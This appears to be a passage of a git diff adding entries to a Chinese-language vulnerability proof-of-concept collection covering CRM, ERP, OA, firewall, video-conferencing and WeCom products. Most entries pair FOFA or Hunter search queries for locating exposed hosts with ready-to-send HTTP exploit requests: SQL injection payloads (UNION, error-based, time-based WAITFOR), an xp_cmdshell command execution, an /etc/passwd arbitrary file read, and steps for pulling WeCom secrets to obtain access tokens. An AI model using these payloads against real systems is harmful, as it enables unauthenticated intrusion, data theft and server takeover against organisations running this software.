+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1701754958503-02c63b7d-1e55-430e-bc14-1bfec57ca492.png](./img/NW8qdWbMZsOQJ36m/1701754958503-02c63b7d-1e55-430e-bc14-1bfec57ca492-076513.png)
+
+获取命令执行结果
+
+```java
+GET /sslvpn/ceshi.txt HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1701754995310-190a24ff-8343-4b7e-9499-43cb74c7d076.png](./img/NW8qdWbMZsOQJ36m/1701754995310-190a24ff-8343-4b7e-9499-43cb74c7d076-746433.png)
+
+
+
+> 更新: 2024-02-29 23:57:16  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hqynfpeg5ms3gnkw>
\ No newline at end of file
diff --git a/任我行 CRM SmsDataList SQL注入漏洞.md b/任我行 CRM SmsDataList SQL注入漏洞.md
index ce5115e..e0d92a2 100644
--- a/任我行 CRM SmsDataList SQL注入漏洞.md	
+++ b/任我行 CRM SmsDataList SQL注入漏洞.md	
@@ -1,5 +1,14 @@
 ## 任我行 CRM SmsDataList SQL注入漏洞
+
+## fofa
+
+```javascript
+app="任我行-CRM"
 ```
+
+## poc
+
+```javascript
 POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
 Host: 
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.1361.63 Safari/537.36
@@ -10,5 +19,4 @@ Content-Type: application/x-www-form-urlencoded
 Content-Length: 170
 
 Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=00000000*
-
 ```
diff --git a/任我行-CRM-SmsDataList-SQL注入漏洞.md b/任我行-CRM-SmsDataList-SQL注入漏洞.md
new file mode 100644
index 0000000..ce5115e
--- /dev/null
+++ b/任我行-CRM-SmsDataList-SQL注入漏洞.md
@@ -0,0 +1,14 @@
+## 任我行 CRM SmsDataList SQL注入漏洞
+```
+POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.1361.63 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 170
+
+Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=00000000*
+
+```
diff --git a/任我行协同CRMSmsDataListSQL注入漏洞.md b/任我行协同CRMSmsDataListSQL注入漏洞.md
new file mode 100644
index 0000000..bdeeee8
--- /dev/null
+++ b/任我行协同CRMSmsDataListSQL注入漏洞.md
@@ -0,0 +1,37 @@
+# 任我行协同CRM SmsDataList SQL注入漏洞
+
+# 一、漏洞简介
+任我行CRM是CRM（客户关系管理）、OA（自动化办公）、OM（目标管理）、KM（知识管理）、HR（人力资源）一体化的企业管理软件。通过建立组织运营管理铁三角（目标行动-企业文化-知识复制），一切围绕以客户为中心的全方位、透明化业务管理（市场-销售-生产-服务），打造企业组织高效协同的运营管理平台。任我行协同CRM存在SQL注入漏洞，远程未授权攻击者可利用此漏洞获取敏感信息，进一步利用可能获取目标系统权限。
+
+# 二、影响版本
++ 任我行协同CRM
+
+# 三、资产测绘
++ hunter`app.name="任我行 CRM"`
++ 登录页面
+
+![1693755730548-775a0355-02ba-402a-84c9-f9c7641487b3.png](./img/fb9-U7Q5eukS7Cj1/1693755730548-775a0355-02ba-402a-84c9-f9c7641487b3-878825.png)
+
+# 四、漏洞复现
+```plain
+POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
+Host: {hostname}
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Content-Length: 23
+
+Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=0000000000'and 1=convert(int,(db_name())) AND 'CvNI'='CvNI
+```
+
+![1693755785656-95d682b9-8ed9-43d5-9820-2b9472793922.png](./img/fb9-U7Q5eukS7Cj1/1693755785656-95d682b9-8ed9-43d5-9820-2b9472793922-602439.png)
+
+![1693755800442-ba863c4c-023b-4191-a0cd-d7b7f1f28132.png](./img/fb9-U7Q5eukS7Cj1/1693755800442-ba863c4c-023b-4191-a0cd-d7b7f1f28132-482931.png)
+
+
+
+> 更新: 2024-02-29 23:55:50  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qng5bs4r6v7vunkw>
\ No newline at end of file
diff --git a/任我行协同CRM普及版Edit存在SQL注入漏洞.md b/任我行协同CRM普及版Edit存在SQL注入漏洞.md
new file mode 100644
index 0000000..8200c7c
--- /dev/null
+++ b/任我行协同CRM普及版Edit存在SQL注入漏洞.md
@@ -0,0 +1,26 @@
+# 任我行协同CRM普及版Edit存在SQL注入漏洞
+
+任我行协同CRM普及版是由成都市任我行信息技术有限公司开发的一款客户关系管理软件。任我行协同CRM普及版 CommonDict/Edit 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+app="任我行-CRM"
+```
+
+## poc
+
+```javascript
+POST /crm/api/OpenApi/CommonDict/Edit?accesstoken=1&accesskey=1&timestamp=1&nonce=1&signature=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+
+enumType=69&data={"ID":"1","Name":"'+UNION+ALL+SELECT+@@VERSION--"}
+```
+
+![image-20241122153505463](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221535532.png)
\ No newline at end of file
diff --git a/任我行管家婆分销ERP系统存在sql注入漏洞.md b/任我行管家婆分销ERP系统存在sql注入漏洞.md
new file mode 100644
index 0000000..9672f1c
--- /dev/null
+++ b/任我行管家婆分销ERP系统存在sql注入漏洞.md
@@ -0,0 +1,31 @@
+# 任我行管家婆分销ERP系统存在sql注入漏洞
+
+# 一、漏洞简介
+成都任我行软件股份有限公司管家婆分销ERP系统存在sql注入漏洞
+
+# 二、影响版本
++ 管家婆分销ERP系统
+
+# 三、资产测绘
++ hunter`app.name="任我行管家婆分销 ERP"`
++ 特征
+
+![1699200115160-f74d7aa1-ec34-4806-8151-2bf4ef69fa85.png](./img/j1jES1lDMCQvT9nF/1699200115160-f74d7aa1-ec34-4806-8151-2bf4ef69fa85-743940.png)
+
+# 四、漏洞复现
+访问以下路径报错
+
+```plain
+/common/viewaccountBase.asp?TimeCheckPoint=80616.91&billnumberid=-1&billtype=
+```
+
+![1699200602090-f8c2751d-1e3a-43c5-bdc5-138975e733ba.png](./img/j1jES1lDMCQvT9nF/1699200602090-f8c2751d-1e3a-43c5-bdc5-138975e733ba-525092.png)
+
+sqlmap
+
+![1699200576963-197e2080-8057-4fc4-8f58-6ffa8dc49a28.png](./img/j1jES1lDMCQvT9nF/1699200576963-197e2080-8057-4fc4-8f58-6ffa8dc49a28-122769.png)
+
+
+
+> 更新: 2024-02-29 23:55:50  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sazxvh1vu8fxg8rn>
\ No newline at end of file
diff --git a/仿抖音短视频网站系统index存在前台SQL注入漏洞.md b/仿抖音短视频网站系统index存在前台SQL注入漏洞.md
new file mode 100644
index 0000000..a4d6742
--- /dev/null
+++ b/仿抖音短视频网站系统index存在前台SQL注入漏洞.md
@@ -0,0 +1,36 @@
+# 仿抖音短视频网站系统index存在前台SQL注入漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.84);">抖音视频APP/仿9视频APP/短视频功能/原生双端开发，除了直播没有开通，其他功能都是精仿，非会员不能评论，发布视频需要注册，功能模块很多，支付模式微信，支付宝，卡密，用户自己上传带赏金，点赞，关注，留言等功能。仿抖音短视频网站系统index存在前台SQL注入漏洞</font>
+
+# <font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font>
++ 仿抖音短视频网站系统
+
+# 三、资产测绘
+```plain
+"/public/index/images/new_logo.png"
+```
+
+![1730713571936-be1c3306-5a3d-4f16-b069-cb01334a4d70.png](./img/tqFWhBpuvEPmstSt/1730713571936-be1c3306-5a3d-4f16-b069-cb01334a4d70-416120.png)
+
+# 四、漏洞复现
+```plain
+POST /index.php?g=appapi&m=auth&a=success HTTP/1.1
+Host: 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencode
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
+Connection: close
+
+uid=(SELECT 7052 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(USER() AS NCHAR),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+```
+
+![1730713829601-90fafd7e-a881-41b9-a35b-597eb09093fa.png](./img/tqFWhBpuvEPmstSt/1730713829601-90fafd7e-a881-41b9-a35b-597eb09093fa-070446.png)
+
+
+
+> 更新: 2024-11-27 10:00:37  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uml4ee1m5cxyvkfo>
\ No newline at end of file
diff --git a/企业微信接口未授权访问漏洞.md b/企业微信接口未授权访问漏洞.md
new file mode 100644
index 0000000..5d8db74
--- /dev/null
+++ b/企业微信接口未授权访问漏洞.md
@@ -0,0 +1,46 @@
+# 企业微信接口未授权访问漏洞
+
+# 一、漏洞简介
+企业微信/cgi-bin/gateway/agentinfo接口未授权情况下可直接获取企业微信secret等敏感信息，可导致企业微信全量数据被获取，文件获取、使用企业微信轻应用对内利用发送钓鱼文件和链接等风险。
+
+# 二、影响版本
++ 企业微信
+
+# 三、资产测绘
++ hunter：`web.icon=="e1750fed09bcc7df102a0e593ffe2b69"`
+
+![1691831077389-ecf0d266-1973-476d-bf80-28bd79c62d0b.png](./img/BQkOXYezQukpooIW/1691831077389-ecf0d266-1973-476d-bf80-28bd79c62d0b-918918.png)
+
++ 登录页面：
+
+![1691831352586-b9e544cc-78cf-4feb-9071-83176a213f2b.png](./img/BQkOXYezQukpooIW/1691831352586-b9e544cc-78cf-4feb-9071-83176a213f2b-341488.png)
+
+
+
+# 四、漏洞复现
+1. 通过泄露信息接口可以获取`corpid`和`corpsecret`
+
+```plain
+https://<企业微信域名>/cgi-bin/gateway/agentinfo
+```
+
+![1691831388927-6404a99b-4034-461e-a122-4b378f76f340.png](./img/BQkOXYezQukpooIW/1691831388927-6404a99b-4034-461e-a122-4b378f76f340-481930.png)
+
+2. 使用`corpsecret`和`corpid`获得`token`，其中`corpid`为上图中`strcorpid`、`corpsecret`为上图中`Secret`
+
+```plain
+https://<企业微信域名>/cgi-bin/gettoken?corpid=ID&corpsecret=SECRET
+```
+
+![1691831554361-cc7d1845-d373-4ee1-8c7f-5766106c7504.png](./img/BQkOXYezQukpooIW/1691831554361-cc7d1845-d373-4ee1-8c7f-5766106c7504-710668.png)
+
+3. 使用token访问诸如企业通讯录信息，修改用户密码，发送消息，云盘等接口
+
+    具体利用查看[企业微信开发者中心文档](https://developer.work.weixin.qq.com/document/path/90664)
+
+![1691832111634-97ade7db-7f46-4771-ba7b-0b02cd26253c.png](./img/BQkOXYezQukpooIW/1691832111634-97ade7db-7f46-4771-ba7b-0b02cd26253c-905023.png)
+
+
+
+> 更新: 2024-02-29 23:58:31  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gb52tl24nioiceab>
\ No newline at end of file
diff --git a/企望制造-ERP-comboxstore.action-远程命令执行漏洞.md b/企望制造-ERP-comboxstore.action-远程命令执行漏洞.md
new file mode 100644
index 0000000..9326794
--- /dev/null
+++ b/企望制造-ERP-comboxstore.action-远程命令执行漏洞.md
@@ -0,0 +1,9 @@
+## 企望制造 ERP comboxstore.action 远程命令执行漏洞
+```
+
+POST /mainFunctions/comboxstore.action HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+Host: xxx.xxx.xxx.xxx
+
+comboxsql=exec%20xp_cmdshell%20'type%20C:\Windows\Win.ini'
+```
diff --git a/企望制造ERPcomboxstore.actionSQL注入漏洞.md b/企望制造ERPcomboxstore.actionSQL注入漏洞.md
new file mode 100644
index 0000000..6b046e2
--- /dev/null
+++ b/企望制造ERPcomboxstore.actionSQL注入漏洞.md
@@ -0,0 +1,49 @@
+# 企望制造ERP comboxstore.action SQL注入漏洞
+
+# 一、漏洞简介
+企望制造eERP系统由深知纸箱行业特点和业务流程的多位IT专家打造，具有国际先进的管理方式，将现代化的管理方式融入erp软件中，让企业分分钟就拥有科学的管理经验。 erp的功能包括成本核算、报价定价、订单下达、生产下单、现场管理等多种功能。由于企望制造 ERP comboxstore.action接口权限设置不当，默认的配置可执行任意SQL语句，利用xp_cmdshell函数可远程执行命令，未经认证的攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 企望制造ERP系统
+
+# 三、资产测绘
++ hunter`app.name="企望制造ERP"`
++ 登录页面
+
+![1693910033825-52c78947-5989-4307-9115-aad9c9a3a87e.png](./img/g3JR0CDELSXnpqfr/1693910033825-52c78947-5989-4307-9115-aad9c9a3a87e-529920.png)
+
+# 四、漏洞复现
+1.访问`poc`出现如下页面表示存在漏洞
+
+```plain
+/mainFunctions/comboxstore.action
+```
+
+![1693910438559-36044b06-551f-4853-ac6d-8de9fbe97157.png](./img/g3JR0CDELSXnpqfr/1693910438559-36044b06-551f-4853-ac6d-8de9fbe97157-625317.png)
+
+2. 执行SQL语句获取数据库版本
+
+```plain
+POST /mainFunctions/comboxstore.action HTTP/1.1
+Host: xx.xx.xx.xx	
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: JSESSIONID=7256C68B9C89F11BE2F841C3F1CAA415
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 29
+
+comboxsql=select%20@@version;
+```
+
+![1693910681210-3bb44a13-6f9c-450e-9a10-9309fa6f8cc2.png](./img/g3JR0CDELSXnpqfr/1693910681210-3bb44a13-6f9c-450e-9a10-9309fa6f8cc2-183096.png)
+
+![1693911193284-eefe9f64-ead8-478a-ac99-b62baaa53d9f.png](./img/g3JR0CDELSXnpqfr/1693911193284-eefe9f64-ead8-478a-ac99-b62baaa53d9f-226165.png)
+
+
+
+> 更新: 2024-02-29 23:55:50  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ry4xq0e8le5qgn5r>
\ No newline at end of file
diff --git a/企望制造ERP系统drawGrid.action存在SQL漏洞.md b/企望制造ERP系统drawGrid.action存在SQL漏洞.md
new file mode 100644
index 0000000..ba2cec1
--- /dev/null
+++ b/企望制造ERP系统drawGrid.action存在SQL漏洞.md
@@ -0,0 +1,26 @@
+# 企望制造ERP系统drawGrid.action存在SQL漏洞
+
+企望制造ERP系统 drawGrid.action 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+title="企望制造ERP系统"
+```
+
+## poc
+
+```javascript
+POST /mainFunctions/drawGrid.action;cookieLogin.action HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+tablename=1';WAITFOR DELAY '0:0:5'--
+```
+
+![image-20241114140739587](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141407656.png)
\ No newline at end of file
diff --git a/众智OA办公系统Login存在SQL注入漏洞.md b/众智OA办公系统Login存在SQL注入漏洞.md
new file mode 100644
index 0000000..4366daf
--- /dev/null
+++ b/众智OA办公系统Login存在SQL注入漏洞.md
@@ -0,0 +1,26 @@
+# 众智OA办公系统Login存在SQL注入漏洞
+
+众智OA办公系统Login存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+body="/Account/Login?ACT=Index"
+```
+
+## poc
+
+```javascript
+POST /Account/Login?ACT=Index&CLR=Home HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+
+username=1');WAITFOR+DELAY+'0:0:5'--&password=1&RememberMe=false
+```
+
+![image-20241012132503527](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410121325595.png)
\ No newline at end of file
diff --git a/众诚网上订单系统o_sa_order.ashx存在SQL注入漏洞.md b/众诚网上订单系统o_sa_order.ashx存在SQL注入漏洞.md
new file mode 100644
index 0000000..c1eb463
--- /dev/null
+++ b/众诚网上订单系统o_sa_order.ashx存在SQL注入漏洞.md
@@ -0,0 +1,27 @@
+# 众诚网上订单系统o_sa_order.ashx存在SQL注入漏洞
+
+众诚网上订单系统o_sa_order.ashx存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```yaml
+title="众诚网上订单系统"
+```
+
+## poc
+
+```javascript
+POST /ajax/o_sa_order.ashx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br, zstd
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Connection: keep-alive
+Priority: u=0
+ 
+type=login&user_id=1%27);WAITFOR%20DELAY%20%270:0:5%27--&user_pwd=1
+```
+
diff --git a/众诚网上订单系统o_sa_order存在SQL注入漏洞.md b/众诚网上订单系统o_sa_order存在SQL注入漏洞.md
new file mode 100644
index 0000000..10190ca
--- /dev/null
+++ b/众诚网上订单系统o_sa_order存在SQL注入漏洞.md
@@ -0,0 +1,38 @@
+# 众诚网上订单系统o_sa_order存在SQL注入漏洞
+
+# 一、漏洞简介
+众诚网上订单系统o_sa_order存在SQL注入漏洞，攻击者可获取数据库敏感信息。
+
+# 二、影响版本
++ DBApi
+
+# 三、资产测绘
++ fofa`title="欢迎使用众诚网上订单系统"`
++ 特征
+
+![1725327701850-b2fe295e-5169-4bf6-a0bf-451d4d6b9a96.png](./img/3-Rm4Tgak8tfb8DR/1725327701850-b2fe295e-5169-4bf6-a0bf-451d4d6b9a96-637276.png)
+
+# 四、漏洞复现
+```plain
+POST /ajax/o_sa_order.ashx HTTP/1.1
+Host: 
+Content-Length: 42
+Accept: */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
+Connection: keep-alive
+ 
+type=login&user_id=admin'&user_pwd=1111111
+```
+
+![1725327746928-f84f08d3-735c-4fb4-9b17-0fafb6d5bb35.png](./img/3-Rm4Tgak8tfb8DR/1725327746928-f84f08d3-735c-4fb4-9b17-0fafb6d5bb35-682291.png)
+
+
+
+
+
+> 更新: 2024-10-22 09:36:10  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ey0ogvbchsz4zpil>
\ No newline at end of file
diff --git a/优客API接口管理系统存在SQL注入漏洞.md b/优客API接口管理系统存在SQL注入漏洞.md
new file mode 100644
index 0000000..0d9d78b
--- /dev/null
+++ b/优客API接口管理系统存在SQL注入漏洞.md
@@ -0,0 +1,36 @@
+# 优客API接口管理系统存在SQL注入漏洞
+
+# 一、漏洞简介
+优客API接口管理系统，内置30+API接口，支持服务器信息，网站ICP备案，抖音无水印，QQ在线状态QQ头像，获取历史上的今天，IP签名档，ICO站标获，随机动漫图，网站标题获取，爱站权重获取，城市天气获取，随机一言，皮皮虾无水印，每日Bing壁纸，垃圾分类，查询手机号归属地，申通快递查询等接口功能。优客API接口管理系统存在SQL注入漏洞
+
+# 二、影响版本
++ 优客API接口管理系统
+
+# 三、资产测绘
++ fofa
+
+```plain
+"public/static/index/css/flaghome.css"
+```
+
++ 特征
+
+![1731383630664-4e1345d0-9673-4677-bcc6-1ca61d9895ab.png](./img/TRHl7koVp2Qt2mXm/1731383630664-4e1345d0-9673-4677-bcc6-1ca61d9895ab-780835.png)
+
+# 四、漏洞复现
+```plain
+POST /index/index/doc HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
+Connection: close
+
+id=') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(IFNULL(CAST(CURRENT_USER() AS NCHAR),0x20)),NULL-- -
+```
+
+![1731383899209-0422239d-a29b-46dd-8538-6b6be399667b.png](./img/TRHl7koVp2Qt2mXm/1731383899209-0422239d-a29b-46dd-8538-6b6be399667b-371311.png)
+
+
+
+> 更新: 2024-11-27 10:00:07  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xphkgwr0lgod5047>
\ No newline at end of file
diff --git a/优客API接口管理系统存在信息泄露漏洞.md b/优客API接口管理系统存在信息泄露漏洞.md
new file mode 100644
index 0000000..ad0d68d
--- /dev/null
+++ b/优客API接口管理系统存在信息泄露漏洞.md
@@ -0,0 +1,30 @@
+# 优客API接口管理系统存在信息泄露漏洞
+
+# 一、漏洞简介
+优客API接口管理系统，内置30+API接口，支持服务器信息，网站ICP备案，抖音无水印，QQ在线状态QQ头像，获取历史上的今天，IP签名档，ICO站标获，随机动漫图，网站标题获取，爱站权重获取，城市天气获取，随机一言，皮皮虾无水印，每日Bing壁纸，垃圾分类，查询手机号归属地，申通快递查询等接口功能。优客API接口管理系统存在信息泄露漏洞
+
+# 二、影响版本
++ 优客API接口管理系统
+
+# 三、资产测绘
++ fofa
+
+```plain
+"public/static/index/css/flaghome.css"
+```
+
++ 特征
+
+![1731383630664-4e1345d0-9673-4677-bcc6-1ca61d9895ab.png](./img/h0O5SDzmZG9iW3Ie/1731383630664-4e1345d0-9673-4677-bcc6-1ca61d9895ab-181220.png)
+
+# 四、漏洞复现
+```plain
+/runtime/log/202411/12.log
+```
+
+![1731383690530-7769f625-05cd-4ee1-9f65-7636c415cadb.png](./img/h0O5SDzmZG9iW3Ie/1731383690530-7769f625-05cd-4ee1-9f65-7636c415cadb-694826.png)
+
+
+
+> 更新: 2024-11-27 10:00:07  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ptvdeuz7cchr75g8>
\ No newline at end of file
diff --git a/会捷通云视讯平台任意文件读取漏洞.md b/会捷通云视讯平台任意文件读取漏洞.md
new file mode 100644
index 0000000..0e92bcb
--- /dev/null
+++ b/会捷通云视讯平台任意文件读取漏洞.md
@@ -0,0 +1,36 @@
+# 会捷通云视讯平台任意文件读取漏洞
+
+# 一、漏洞复现
+<font style="color:rgb(0,0,0);">会捷通云视讯平台是基于软视频会议在私有云或者公有云环境下提供的企业级视频通讯平台，可以为用户提供跨越企业内外，基于会议室、桌面和移动应用的视频通讯和会议解决方案，会捷通云视讯平台平台fileDownload处存在任意文件读取漏洞，攻击者通过漏洞可以读取服务器任意文件。</font>
+
+# <font style="color:rgb(0,0,0);">二、影响版本</font>
++ <font style="color:rgb(0,0,0);">会捷通云视讯平台</font>
+
+# <font style="color:rgb(0,0,0);">三、资产测绘</font>
++ hunter`web.body="/him/api/rest/v1.0/node/role"`
++ 特征
+
+![1699886043031-85921d94-a0de-4ee2-b42e-019690c22439.png](./img/LdsjjeXaM_Wwu42w/1699886043031-85921d94-a0de-4ee2-b42e-019690c22439-950668.png)
+
+# 四、漏洞复现
+```plain
+POST /fileDownload HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 46
+
+action=downloadBackupFile&fullPath=/etc/passwd
+```
+
+![1699886073566-3a3c1975-ac9a-4dfa-b1fd-af7c9d921c50.png](./img/LdsjjeXaM_Wwu42w/1699886073566-3a3c1975-ac9a-4dfa-b1fd-af7c9d921c50-061757.png)
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cbnq9fgdga6chkxw>
\ No newline at end of file
diff --git a/佑友防火墙存在信息泄露漏洞.md b/佑友防火墙存在信息泄露漏洞.md
new file mode 100644
index 0000000..d6c1fb2
--- /dev/null
+++ b/佑友防火墙存在信息泄露漏洞.md
@@ -0,0 +1,26 @@
+# 佑友防火墙存在信息泄露漏洞
+
+# 一、漏洞简介
+佑友防火墙+路由，保障您的网络更安全更稳定。弥补传统路由器因内外人数增加带来的网络延迟和不稳定问题；防火墙模块具备了防黑功能，防止ARP等病毒骚扰；佑友防火墙网关同时还配备了上网行为管理模块，可以合理有效控制员工上网行为，大大降低了员工上网中病毒的概率，同时高效使用公司带宽，不会造成网络阻塞等状况。佑友防火墙系统存在敏感信息泄露漏洞
+
+# 二、影响版本
++ 佑友防火墙
+
+# 三、资产测绘
+```plain
+fofa：title="佑友防火墙"
+```
+
+![1716105993266-59e9b128-8a93-41a8-b677-00d8945bcb20.png](./img/tjcmVWMdveMKzpDP/1716105993266-59e9b128-8a93-41a8-b677-00d8945bcb20-272803.png)
+
+# 四、漏洞复现
+```plain
+/index.php?c=index&a=ajax_getSystemResource
+```
+
+![1716106363889-c8322d3e-f2a2-431a-95ac-5c624b224d66.png](./img/tjcmVWMdveMKzpDP/1716106363889-c8322d3e-f2a2-431a-95ac-5c624b224d66-034201.png)
+
+
+
+> 更新: 2024-05-23 12:38:07  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gkhyz7gekz2ws3s3>
\ No newline at end of file
diff --git a/佑友防火墙存在后台命令执行漏洞.md b/佑友防火墙存在后台命令执行漏洞.md
new file mode 100644
index 0000000..968cb17
--- /dev/null
+++ b/佑友防火墙存在后台命令执行漏洞.md
@@ -0,0 +1,26 @@
+# 佑友防火墙存在后台命令执行漏洞
+
+# 一、漏洞简介
